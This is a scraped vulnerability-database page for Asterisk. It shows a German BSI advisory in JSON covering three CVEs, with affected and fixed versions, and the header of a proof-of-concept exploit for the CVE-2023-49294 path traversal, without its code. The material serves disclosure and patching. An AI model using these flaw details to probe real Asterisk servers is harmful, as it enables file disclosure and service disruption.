    "title": "Digium Certified Asterisk: Mehrere Schwachstellen",
    "tracking": {
      "current_release_date": "2024-12-08T23:00:00.000+00:00",
      "generator": {
        "date": "2024-12-09T09:21:37.410+00:00",
        "engine": {
          "name": "BSI-WID",
          "version": "1.3.10"
        }
      },
      "id": "WID-SEC-W-2023-3158",
      "initial_release_date": "2023-12-14T23:00:00.000+00:00",
      "revision_history": [
        {
          "date": "2023-12-14T23:00:00.000+00:00",
          "number": "1",
          "summary": "Initiale Fassung"
        },
        {
          "date": "2023-12-19T23:00:00.000+00:00",
          "number": "2",
          "summary": "Link erg\u00e4nzt"
        },
        {
          "date": "2023-12-28T23:00:00.000+00:00",
          "number": "3",
          "summary": "Neue Updates von Debian aufgenommen"
        },
        {
          "date": "2024-01-04T23:00:00.000+00:00",
          "number": "4",
          "summary": "Neue Updates von Debian aufgenommen"
        },
        {
          "date": "2024-12-08T23:00:00.000+00:00",
          "number": "5",
          "summary": "Neue Updates von Gentoo aufgenommen"
        }
      ],
      "status": "final",
      "version": "5"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "category": "product_name",
            "name": "Debian Linux",
            "product": {
              "name": "Debian Linux",
              "product_id": "2951",
              "product_identification_helper": {
                "cpe": "cpe:/o:debian:debian_linux:-"
              }
            }
          }
        ],
        "category": "vendor",
        "name": "Debian"
      },
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "\u003c18.9-cert6",
                "product": {
                  "name": "Digium Certified Asterisk \u003c18.9-cert6",
                  "product_id": "T031720"
                }
              },
              {
                "category": "product_version",
                "name": "18.9-cert6",
                "product": {
                  "name": "Digium Certified Asterisk 18.9-cert6",
                  "product_id": "T031720-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:digium:certified_asterisk:18.9-cert6"
                  }
                }
              }
            ],
            "category": "product_name",
            "name": "Certified Asterisk"
          }
        ],
        "category": "vendor",
        "name": "Digium"
      },
      {
        "branches": [
          {
            "category": "product_name",
            "name": "Gentoo Linux",
            "product": {
              "name": "Gentoo Linux",
              "product_id": "T012167",
              "product_identification_helper": {
                "cpe": "cpe:/o:gentoo:linux:-"
              }
            }
          }
        ],
        "category": "vendor",
        "name": "Gentoo"
      },
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "\u003c18.20.1",
                "product": {
                  "name": "Open Source Asterisk \u003c18.20.1",
                  "product_id": "T031721"
                }
              },
              {
                "category": "product_version",
                "name": "18.20.1",
                "product": {
                  "name": "Open Source Asterisk 18.20.1",
                  "product_id": "T031721-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:digium:asterisk:18.20.1"
                  }
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c20.5.1",
                "product": {
                  "name": "Open Source Asterisk \u003c20.5.1",
                  "product_id": "T031722"
                }
              },
              {
                "category": "product_version",
                "name": "20.5.1",
                "product": {
                  "name": "Open Source Asterisk 20.5.1",
                  "product_id": "T031722-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:digium:asterisk:20.5.1"
                  }
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c21.0.1",
                "product": {
                  "name": "Open Source Asterisk \u003c21.0.1",
                  "product_id": "T031723"
                }
              },
              {
                "category": "product_version",
                "name": "21.0.1",
                "product": {
                  "name": "Open Source Asterisk 21.0.1",
                  "product_id": "T031723-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:digium:asterisk:21.0.1"
                  }
                }
              }
            ],
            "category": "product_name",
            "name": "Asterisk"
          }
        ],
        "category": "vendor",
        "name": "Open Source"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2023-37457",
      "notes": [
        {
          "category": "description",
          "text": "Es existiert eine Schwachstelle in Digium Certified Asterisk und Asterisk. Die \u0027Update\u0027-Funktionalit\u00e4t der Dialplan-Funktion PJSIP_HEADER kann den verf\u00fcgbaren Pufferplatz f\u00fcr die Speicherung des neuen Wertes eines Headers \u00fcberschreiten. Ein Angreifer kann diese Schwachstelle ausnutzen, um einen Denial of Service zu verursachen."
        }
      ],
      "product_status": {
        "known_affected": [
          "T031720",
          "2951",
          "T031722",
          "T031721",
          "T031723",
          "T012167"
        ]
      },
      "release_date": "2023-12-14T23:00:00.000+00:00",
      "title": "CVE-2023-37457"
    },
    {
      "cve": "CVE-2023-49294",
      "notes": [
        {
          "category": "description",
          "text": "Es existiert eine Schwachstelle in Digium Certified Asterisk und Asterisk. Ein Path Traversal Problem in AMI GetConfig erm\u00f6glicht Zugriff auf externe Dateien. Ein privilegierter Angreifer kann diese Schwachstelle ausnutzen, um Informationen offenzulegen."
        }
      ],
      "product_status": {
        "known_affected": [
          "T031720",
          "2951",
          "T031722",
          "T031721",
          "T031723",
          "T012167"
        ]
      },
      "release_date": "2023-12-14T23:00:00.000+00:00",
      "title": "CVE-2023-49294"
    },
    {
      "cve": "CVE-2023-49786",
      "notes": [
        {
          "category": "description",
          "text": "Es existiert eine Schwachstelle in Digium Certified Asterisk und Asterisk. W\u00e4hrend des Rufaufbaus kommt es in der Hello-Handshake-Phase des DTLS-Protokolls zu einer Race-Condition. Ein entfernter, anonymer Angreifer kann diese Schwachstelle mit speziell bearbeiteten DTLS Hello-Paketen ausnutzen, um einen Denial of Service zu verursachen."
        }
      ],
      "product_status": {
        "known_affected": [
          "T031720",
          "2951",
          "T031722",
          "T031721",
          "T031723",
          "T012167"
        ]
      },
      "release_date": "2023-12-14T23:00:00.000+00:00",
      "title": "CVE-2023-49786"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2023-49294 (GCVE-0-2023-49294)

CERTFR-2023-AVI-1040

Solution

CERTFR-2023-AVI-1040

Solution

BDU:2023-08871

FKIE_CVE-2023-49294

GSD-2023-49294

VAR-202312-2340

Date: 2023-03-26

Exploit Author: Sean Pesce

Vendor Homepage: https://asterisk.org/

Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/

Version: 18.20.0

Tested on: Debian Linux

CVE: CVE-2023-49294

!/usr/bin/env python3

Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that

facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of

file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar

to the common INI configuration format.

References:

https://nvd.nist.gov/vuln/detail/CVE-2023-49294

https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f

https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/

WID-SEC-W-2023-3158

Tags

Sightings

Nomenclature